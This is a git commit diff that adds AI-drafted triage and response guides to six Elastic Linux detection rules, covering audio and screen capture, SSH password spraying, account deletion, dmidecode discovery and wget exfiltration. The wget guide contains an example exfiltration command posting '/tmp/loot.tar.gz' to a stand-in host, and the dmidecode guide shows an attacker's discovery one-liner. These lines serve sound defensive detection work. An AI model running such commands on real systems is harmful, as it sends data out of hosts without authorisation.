Prep for Release 9.3 (#5548)

This commit is contained in:
shashank-elastic
2026-01-12 21:07:07 +05:30
committed by GitHub
parent 8b84c26286
commit 1ce072a4e5
99 changed files with 4599 additions and 48 deletions
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -19,6 +19,37 @@ index = [
language = "kuery"
license = "Elastic License v2"
name = "Linux Audio Recording Activity Detected"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux Audio Recording Activity Detected
This rule flags executions of Linux audio-recording tools (arecord, parec, pw-record, ecasound, pw-cat -r, ffmpeg) started by uncommon parent processes, signaling potential covert microphone capture. Attackers often drop a systemd service or cron job that silently invokes arecord or ffmpeg to record from default PulseAudio/PipeWire devices and stash WAV/MP3 files under user directories or stream them to a remote host. Capturing ambient audio can reveal passwords, meeting content, and sensitive conversations, aiding reconnaissance and espionage.
### Possible investigation steps
- Examine the full process tree and session context (parent/grandparent, controlling TTY, logged-in user) to determine whether launch came from an expected desktop workflow versus non-interactive origins like cron, systemd, or ssh.
- Parse the command line to identify input device and output target, then hunt for created artifacts (WAV/MP3/OGG) under common stash paths (~/.cache, ~/.local/share, /tmp, /var/tmp, hidden directories) and verify timestamps and owner.
- If the command indicates streaming or piping, inspect recent outbound network connections and DNS from the process/user for RTMP/HTTP/SFTP endpoints and correlate with firewall or EDR flow logs to detect exfiltration.
- Check for persistence mechanisms that could re-invoke the recorder, including systemd user/system units and timers, cron/anacron entries, and shell scripts in autostart paths, and disable or quarantine any suspicious items.
- Review audio subsystem and device access evidence (audit logs for open/read on /dev/snd/* and PipeWire/PulseAudio logs showing record nodes) to confirm capture and identify the device and scope.
### False positive analysis
- ffmpeg is executed with -i to read an existing media file for transcode or audio extraction, not to capture from a microphone, which satisfies the rule conditions but is routine multimedia processing.
- A legitimate systemd or cron job starts arecord/parec/pw-record/pw-cat -r to periodically sample audio for device diagnostics or content creation, resulting in an uncommon parent process yet expected outputs under user or application directories.
### Response and remediation
- Immediately terminate arecord, parec, pw-record, ecasound, pw-cat -r, or ffmpeg processes launched by cron/systemd/ssh and stop any associated systemd units/timers, then block outbound RTMP/HTTP/SFTP connections from the recording user.
- Disable and remove persistence that invokes recording, including systemd .service/.timer files under /etc/systemd/system or ~/.config/systemd/user, cron entries in /etc/cron.* or user crontabs, and autostart scripts in ~/.config/autostart or /etc/xdg/autostart, and quarantine any unknown executables or wrappers in /tmp, /var/tmp, or hidden user directories that spawn these tools.
- Before cleanup, preserve the full command line and copies of recorded artifacts (WAV/MP3/OGG) located in ~/.cache, ~/.local/share, /tmp, /var/tmp, and hidden directories, then remove remaining audio files and staging folders after evidence collection.
- Verify recovery by confirming no active record nodes in PipeWire/PulseAudio and no further opens on /dev/snd/*, and restart affected user sessions or hosts if audio subsystem settings were altered.
- Harden by restricting access to /dev/snd/* via udev group membership and AppArmor/SELinux, whitelisting approved desktop apps, and adding detections to flag non-interactive parents launching arecord/ffmpeg or pw-cat -r and creation of large audio files in cache/temp paths.
- Escalate to incident response and privacy/legal if recording is initiated by a root-owned systemd service or an unknown binary in /tmp, or if audio streaming/exfiltration to external IPs/domains is observed.
"""
risk_score = 21
rule_id = "3ee526ce-1f26-45dd-9358-c23100d1121f"
severity = "low"
@@ -30,6 +61,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -20,6 +20,37 @@ index = [
language = "kuery"
license = "Elastic License v2"
name = "Linux Video Recording or Screenshot Activity Detected"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux Video Recording or Screenshot Activity Detected
This alert flags the launch of common Linux screenshot or screen-recording tools—such as scrot, gnome-screenshot, flameshot, grim, or obs—when triggered by an atypical parent process, indicating potential visual data collection. A typical attacker pattern is a compromised user session or remote shell spawning scrot or grim during credential entry to capture MFA codes and application windows, or starting simplescreenrecorder/obs to persistently record the desktop for later exfiltration.
### Possible investigation steps
- Review the process lineage and session context to determine if the capture was launched interactively from a desktop or via ssh/cron/systemd or a script in transient directories.
- Inspect command-line options and environment variables (DISPLAY, WAYLAND_DISPLAY, XAUTHORITY) to identify window/region capture, explicit save targets, or headless clipboard-only usage.
- Search for newly created media files around the alert time (screenshots under ~/Pictures or /tmp, and recordings like .mkv/.webm) and evaluate their sensitivity and relevance.
- Verify binary provenance and integrity by checking installation logs, file path and ownership, hashes, and unexpected copies or modified ELF binaries in user-writable locations.
- Correlate with user and network telemetry for concurrent credential entry, browser MFA prompts, or outbound transfers/clipboard synchronization indicative of exfiltration.
### False positive analysis
- A user presses Print Screen or uses a desktop hotkey, and the environment launches gnome-screenshot, flameshot, or grim via a keybinding/compositor component, producing an uncommon parent despite benign activity.
- Legitimate demo or documentation recording with obs or simplescreenrecorder started by a wrapper script, cron, or a systemd unit can surface as a non-interactive start from an unusual parent without malicious intent.
### Response and remediation
- Immediately terminate the capture process (e.g., scrot, grim, flameshot, gnome-screenshot, simplescreenrecorder, obs) and isolate the host or terminate the GUI session, suspending the user and revoking SSH keys if the parent was sshd, cron, or a systemd unit.
- Eradicate launch points by deleting rogue systemd services/timers, crontab entries, ~/.config/autostart/*.desktop files, and scripts in /tmp or ~/bin that invoke these tools, and replace any trojanized binaries found outside package-managed paths.
- Recover by rotating passwords and invalidating MFA sessions/tokens used during the recorded period, then remove captured media (.png/.jpg/.webm/.mkv) from ~/Pictures, /tmp, and similar staging paths after evidence collection.
- Escalate to incident response and privacy/legal if screenshots/recordings contain credentials, customer data, or secrets, if execution originated from privileged users or servers, or if exfiltration is observed via scp/rsync/curl to external hosts.
- Harden endpoints by uninstalling unneeded screenshot/recording packages, enforcing allowlists and AppArmor/SELinux profiles that block scrot/grim/obs except for approved users, and requiring xdg-desktop-portal/PipeWire screencast prompts for console users only.
- Improve detection by alerting on these binaries executed by sshd/cron/systemd, repeated saves under ~/Pictures or /tmp, copies in user-writable paths (~/bin, /tmp), and outbound transfers of resulting media files.
"""
risk_score = 21
rule_id = "93dd73f9-3e59-45be-b023-c681273baf81"
severity = "low"
@@ -31,6 +62,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -2,7 +2,7 @@
creation_date = "2025/12/24"
integration = ["system"]
maturity = "production"
updated_date = "2025/12/24"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -17,6 +17,36 @@ from = "now-9m"
language = "esql"
license = "Elastic License v2"
name = "Potential Password Spraying Attack via SSH"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Potential Password Spraying Attack via SSH
This rule flags bursts of failed SSH logins coming from the same network origin against many different Linux accounts within a short window, indicating password spraying that can precede account compromise. It matters because attackers try a small set of common passwords across broad user lists to evade lockouts and find one weak credential. A typical pattern is an external VPS rapidly trying passwords like “Welcome123” or “Spring2024!” against 30+ usernames (e.g., admin, test, ubuntu, devops) over five minutes via SSH on a single server.
### Possible investigation steps
- Check for any successful SSH authentications from the same source IP within a short window around the failures and, if found, pivot to session details such as interactive TTY use, sudo activity, and modifications like authorized_keys updates.
- Enrich the source IP with geolocation, ASN, reputation, and cloud-provider attribution and verify whether it is observed attempting SSH across multiple hosts to confirm a broad spray pattern.
- Compare the attempted usernames against your directory to identify valid and privileged or service accounts and confirm whether lockouts, password resets, or MFA challenges were triggered.
- Determine if the affected host is internet-exposed and which port SSH is reachable on, then review current SSH authentication settings (password vs key-based, PAM/MFA) to assess risk of compromise.
- Correlate the source IP with approved scanners, bastion hosts, or change tickets and maintenance windows to quickly rule out sanctioned testing or misconfigured monitoring.
### False positive analysis
- A misconfigured internal automation or admin script on a management or jump host sequentially attempts SSH to many accounts with an outdated password, producing more than 10 distinct usernames and at least 30 failures from a single source IP within five minutes.
- Legitimate users behind a shared NAT or bastion host concurrently attempt SSH with expired credentials during a password rotation or temporary authentication issue, making failures across many distinct usernames appear to come from one IP.
### Response and remediation
- Immediately block the spraying source IP(s) at host firewalls (iptables/nftables) and edge controls, and temporarily restrict SSH (port 22) to approved bastion/jump host CIDRs only.
- If any login succeeded or an sshd session from the same IP is active, terminate it, remove any newly added ~/.ssh/authorized_keys entries, and force password resets with MFA for the targeted users.
- Before restoring normal access, verify no persistence by checking for changes to /etc/ssh/sshd_config, sudoers, or cron jobs and reviewing /var/log/auth.log and lastlog for anomalies, then re-enable only required accounts.
- Escalate to incident response if privileged or service accounts were targeted, the spray spanned multiple servers, or there is evidence of sudo activity, file changes under /root or /etc, or a successful login, and preserve auth logs, bash histories, and firewall block artifacts.
- Harden SSH by disabling PasswordAuthentication, enforcing key-based auth with PAM MFA, setting conservative MaxAuthTries and LoginGraceTime, enabling fail2ban or equivalent bans, and restricting access via AllowUsers/AllowGroups and security group rules.
"""
risk_score = 21
rule_id = "9e81b1fd-e9fb-49a7-8ebe-0d1a14090142"
severity = "low"
@@ -25,6 +55,7 @@ tags = [
"OS: Linux",
"Use Case: Threat Detection",
"Tactic: Credential Access",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/08"
integration = ["system"]
maturity = "production"
updated_date = "2026/01/08"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["filebeat-*", "logs-system.auth-*"]
language = "eql"
license = "Elastic License v2"
name = "Linux User or Group Deletion"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux User or Group Deletion
This rule surfaces successful deletions of Linux users or groups—activity that can erase evidence, hide persistence, or disrupt access control. A common pattern is an attacker with root rights running userdel -r to remove a temporary privileged account they used for access, deleting its home directory and mail spool to strip artifacts. Correlate with recent privilege escalation and changes to sudoers/wheel to identify whether this was malicious cleanup versus routine deprovisioning.
### Possible investigation steps
- Correlate with auth and sudo logs to identify the actor, session (TTY/SSH), and source IP that executed the deletion and confirm whether root was obtained via sudo or another escalation path.
- Inspect the process tree and command line to see if userdel/groupdel used -r to remove the home/mail spool and whether it was launched from an interactive shell, SSH session, or automation tooling.
- Validate expected deprovisioning by checking HR/ticketing/IdM and configuration-management activity around the time, and escalate if the deleted identity was privileged or part of sudo/wheel.
- Build a timeline around the event to find adjacent actions such as account creation, password or key changes, group membership edits, and modifications to /etc/passwd, /etc/group, /etc/shadow, or sudoers.
- Assess impact and persistence by locating services, cron/systemd units, files, ACLs, or running processes still referencing the deleted UID/GID, attempt recovery of the home/mail from backups, and look for wtmp/btmp/lastlog tampering.
### False positive analysis
- Scheduled deprovisioning or baseline enforcement where administrators intentionally remove stale local users or groups associated with retired projects, decommissioned systems, or role changes during maintenance.
- Package uninstall or system maintenance scripts that add a service account during setup and later remove it during cleanup, causing legitimate user/group deletion events.
### Response and remediation
- If the deletion is unauthorized, immediately isolate the host and restrict interactive access by setting PermitRootLogin no and tightening AllowUsers/AllowGroups in /etc/ssh/sshd_config, then systemctl restart sshd to apply.
- Review and clean authorization and persistence by inspecting /etc/sudoers and /etc/sudoers.d for unauthorized rules, checking wheel/sudo memberships in /etc/group, and purging cron or systemd units that reference the deleted UID/GID.
- Recover the identity if legitimate by recreating the user/group with the original UID/GID from /var/backups/{passwd,group,shadow}, restoring the corresponding /home directory and /var/spool/mail from backups, and reassigning orphaned files using find -nouser -nogroup to a valid account.
- Rotate credentials associated with the deleted identity by replacing SSH keys and secrets found in ~/.ssh/authorized_keys and application configs, and invalidate cached tokens and service account credentials that may have been shared.
- Escalate to incident response if the deleted account was privileged (present in wheel/sudo groups), userdel/groupdel used -r to remove the home/mail spool, or evidence of log tampering exists such as truncated /var/log/auth.log or altered wtmp/btmp/lastlog.
- Harden by centralizing local account lifecycle in IdM/LDAP, enforcing visudo-managed sudo changes, enabling auditd watches on /usr/sbin/userdel,/usr/sbin/groupdel and writes to /etc/passwd,/etc/group,/etc/shadow, and deploying AIDE to monitor integrity of /etc.
"""
risk_score = 21
rule_id = "8f8004e1-0783-485f-a3da-aca4362f74a7"
setup = """## Setup
@@ -43,6 +74,7 @@ tags = [
"OS: Linux",
"Use Case: Threat Detection",
"Tactic: Defense Evasion",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -20,6 +20,37 @@ index = [
language = "eql"
license = "Elastic License v2"
name = "System Information Discovery via dmidecode from Parent Shell"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating System Information Discovery via dmidecode from Parent Shell
This rule flags dmidecode launched from a parent shell, signaling collection of hardware and firmware inventory that adversaries use to profile a host and inform exploitation or lateral movement. A typical pattern is an intruder running bash -c 'dmidecode -t system -t bios' within a post-exploitation script to harvest model, serial, BIOS vendor, and hypervisor indicators, then tailoring payload choices or host-based evasion accordingly.
### Possible investigation steps
- Extract the full parent shell command payload to see exact dmidecode arguments, targeted DMI types, and any output redirection or piping to grep, gzip, curl, scp, or similar utilities indicating data collection or exfiltration.
- Correlate execution context by tying the parent shell to the user, TTY versus non-interactive origin (cron/systemd/SSH), source IP, and presence of unexpected sudo/root elevation to judge intent and privilege.
- Pivot on the parent PID and session to list adjacent commands within the timeline to identify broader discovery or staging chains and any script or binary loader used.
- Search for captured output by reviewing recent file writes under /tmp, /var/tmp, /dev/shm, and home directories for DMI dumps, hardware inventory files, or compressed archives, and triage ownership and timestamps.
- Investigate network activity from the shell and its children around the event for outbound connections, especially HTTP/S3/SSH transfers that could carry dmidecode output, and capture destination details for enrichment.
### False positive analysis
- A system administrator runs a shell with -c to execute dmidecode during manual troubleshooting; corroborate with an interactive TTY, a known admin user, and absence of adjacent collection or network activity.
- A legitimate cron or systemd maintenance/provisioning job calls a shell with -c to run dmidecode for hardware inventory; verify the scheduled unit or service, script location under /etc, and expected run cadence.
### Response and remediation
- Immediately kill the shell process running '-c "dmidecode ..."', terminate its children (e.g., grep, gzip, curl, scp), and isolate the host if the command chained output to a network transfer.
- Block observed exfil destinations by adding temporary egress rules for the IP/domain referenced in the parent shell (curl/wget/scp targets), and confiscate any DMI dumps or archives found under /tmp, /var/tmp, or /dev/shm.
- Remove persistence by deleting scripts and jobs that call dmidecode, including entries under /etc/cron.*, systemd units in /etc/systemd/system, or shell scripts dropped in home directories and /opt, and clear residual output files.
- Recover by validating integrity of /usr/sbin/dmidecode and shell binaries (bash/sh/zsh), restoring from backup if tampering is detected, and re-enable network only after rotating passwords and SSH keys for affected accounts.
- Escalate to incident response if dmidecode output is compressed/encoded then sent externally (e.g., '/tmp/dmi.txt.gz' piped to curl or scp), if run via sudo by an unexpected user, or observed on multiple hosts in a short window.
- Harden by restricting dmidecode use to approved scripts via sudoers and AppArmor/SELinux profiles, alerting on shell '-c' hardware inventory commands, auditing writes to /tmp and /var/tmp, and replacing ad-hoc inventory with signed, centrally managed tooling.
"""
references = ["https://research.checkpoint.com/2024/29676/"]
risk_score = 21
rule_id = "da0ebebe-5ad3-4277-95e7-889f5a69b959"
@@ -69,6 +100,7 @@ tags = [
"Data Source: Elastic Endgame",
"Data Source: Elastic Defend",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -23,6 +23,37 @@ index = [
language = "eql"
license = "Elastic License v2"
name = "Potential Data Exfiltration Through Wget"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Potential Data Exfiltration Through Wget
This rule flags Linux processes that launch wget with options that upload a local file via HTTP POST, a behavior used to exfiltrate staged data to an external server. Attackers gather files, compress them in /tmp, then execute wget --post-file=/tmp/loot.tar.gz https://example.com/upload from a non-interactive shell or cron job to covertly push the archive out over standard web traffic.
### Possible investigation steps
- Pull the full command line to extract the posted file path, verify the file still exists, capture size/timestamps, and hash its contents to gauge sensitivity and origin.
- Review the process tree and session context (parent, user, TTY, cron/systemd/container) and correlate with recent logins or scheduler entries to determine whether this was automated or a remote shell action.
- Enrich the destination endpoint with DNS, WHOIS, certificate, proxy, and egress firewall logs, and check for prior communications from this host to the same domain/IP to assess legitimacy.
- Pivot 3060 minutes prior on the host/user for staging activity such as tar/gzip in /tmp, bulk file collection, or discovery commands, and interrogate shell history and filesystem events tied to the posted file.
- If the file was removed post-upload, attempt recovery from EDR or backups and estimate exfil volume and content types via proxy or egress gateway logs to determine impact and drive containment.
### False positive analysis
- A maintenance or monitoring script run via cron posts log archives or configuration snapshots using wget --post-file to an internal HTTP endpoint for routine diagnostics.
- An administrator or developer testing a web form or API uses wget --body-file to POST a sample file during troubleshooting, producing a benign one-off event.
### Response and remediation
- Immediately isolate the host, terminate the offending wget process, block outbound HTTP(S) to the destination domain/IP seen in the command wget --post-file=/path/to/file https://example.com/upload, and quarantine the posted file path and its parent directory.
- Identify and disable any cron, systemd, or shell script that invoked wget with --post-file or --body-file (e.g., entries in /etc/cron.d/, user crontabs, or /home/user/.local/bin/upload.sh), delete the script, and revoke the invoking accounts API tokens and SSH keys.
- Remove staged archives and temp files referenced in the upload (e.g., /tmp/loot.tar.gz and /var/tmp/*.gz), delete companion tooling or collection scripts found alongside them, and reimage the host if system integrity cannot be assured.
- If the posted content includes credentials, source code, or customer data, rotate affected passwords/keys, invalidate tokens, notify data owners, and restore impacted systems or files from known-good backups.
- Escalate to incident response and initiate wider containment if the destination domain/IP is not owned by the organization or resolves to an anonymizing/VPS service, if multiple hosts exhibit wget --post-file from non-interactive sessions, or if the uploader executed as root.
- Harden by enforcing SELinux/AppArmor policies that restrict wget/curl from posting files, requiring egress web proxy allowlists for HTTP POST destinations, adding detections for wget --post-file/--body-file and curl --upload-file/-F, and removing wget from systems where it is unnecessary.
"""
references = ["https://gtfobins.github.io/gtfobins/wget/"]
risk_score = 47
rule_id = "8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6"
@@ -62,6 +93,7 @@ tags = [
"Data Source: Crowdstrike",
"Data Source: SentinelOne",
"Data Source: Elastic Endgame",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"